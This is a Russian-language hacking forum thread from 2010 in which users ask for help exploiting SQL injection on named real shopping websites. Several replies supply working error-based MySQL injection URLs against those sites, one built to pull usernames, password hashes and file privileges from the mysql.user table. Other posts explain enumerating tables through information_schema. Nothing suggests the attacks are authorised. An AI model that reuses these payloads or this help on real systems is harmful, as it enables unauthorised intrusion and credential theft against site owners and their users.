HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15771  
Старый 07.12.2010, 01:30
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от [Ozzi  
"]
[Ozzi] said:
Делаю такой запрос
Код:
select column_name from information_schema.columns where table_name='User'
мне выдает там 5 значенй логин пароль и тд , делаю дальше так
Код:
select логин  from User -
меня бросает на главную страницу почему?
причин может быть несколько, мб таблица в другой базе, тогда вопрос будет фелс, и будет редирект

возможно что там фильтр на определенные слова..

а еще много чего возможно,.. анализируй сайт

смотри на какие слова ругается
 
Ответить с цитированием

  #15772  
Старый 07.12.2010, 01:44
[Ozzi]
Новичок
Регистрация: 26.11.2010
Сообщений: 16
Провел на форуме:
4532

Репутация: -1
По умолчанию

Цитата:
Сообщение от Konqi  
причин может быть несколько, мб таблица в другой базе, тогда вопрос будет фелс, и будет редирект
возможно что там фильтр на определенные слова..
а еще много чего возможно,.. анализируй сайт
смотри на какие слова ругается
А как мне узнать в той ли базе таблица?
 
Ответить с цитированием

  #15773  
Старый 07.12.2010, 01:45
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

Цитата:
Сообщение от [Ozzi  
"]
[Ozzi] said:
А как мне узнать в той ли базе таблица?
table_schema
 
Ответить с цитированием

  #15774  
Старый 07.12.2010, 01:47
[Ozzi]
Новичок
Регистрация: 26.11.2010
Сообщений: 16
Провел на форуме:
4532

Репутация: -1
По умолчанию

Цитата:
Сообщение от Gorev  
table_schema
А пример с использованием можно?)
 
Ответить с цитированием

  #15775  
Старый 07.12.2010, 01:52
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от [Ozzi  
"]
[Ozzi] said:
А пример с использованием можно?)
select table_schema from information_schema.tables where table_name='идем_читать_маны_по_с кулям'
 
Ответить с цитированием

  #15776  
Старый 07.12.2010, 19:34
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
По умолчанию

http://www.totalbhakti.com/shop.php?cid=2'

Помогите расскурутить чучуть) а то не получается \ =
 
Ответить с цитированием

  #15777  
Старый 07.12.2010, 19:39
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

GroM88

http://www.totalbhakti.com/shop.php?cid=2+or+1+group+by+concat(version(),floo r(rand(0)*2))having+min(0)+or+1--

error based

mysql юзверы (дада,майскул доступен на чтение)

http://www.totalbhakti.com/shop.php?cid=2+and(select+1+from(select+count(*),c oncat((select+(select+(SELECT+concat_ws(0x3a,user, password,file_priv)+from+mysql.user+limit+0,1) )+from+information_schema.tables+limit+0,1),floor( rand(0)*2))x+from information_schema.tables+group+by+x)a)+and+1=1
 
Ответить с цитированием

  #15778  
Старый 07.12.2010, 22:02
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
По умолчанию

Глупый вопрос) но все же)

Какие запросы использовать в скуле что бы просматривать таблицы из определенной БД?

ну т.е. information_schema.tables выводит все таблицы из всех бд)

а мне надо посмотреть таблицы из определенной бд)
 
Ответить с цитированием

  #15779  
Старый 07.12.2010, 22:13
[Ozzi]
Новичок
Регистрация: 26.11.2010
Сообщений: 16
Провел на форуме:
4532

Репутация: -1
По умолчанию

Помогите раскрутить)

http://www.grieger-boote.de/product_info.php?products_id=3934'
 
Ответить с цитированием

  #15780  
Старый 07.12.2010, 22:17
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от [Ozzi  
"]
[Ozzi] said:
Помогите раскрутить)
http://www.grieger-boote.de/product_info.php?products_id=3934'
http://www.grieger-boote.de/product_info.php?products_id=3934' or 1 group by concat((select version()),floor(rand(0)*2)) having min(0) or 1 -- 1
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.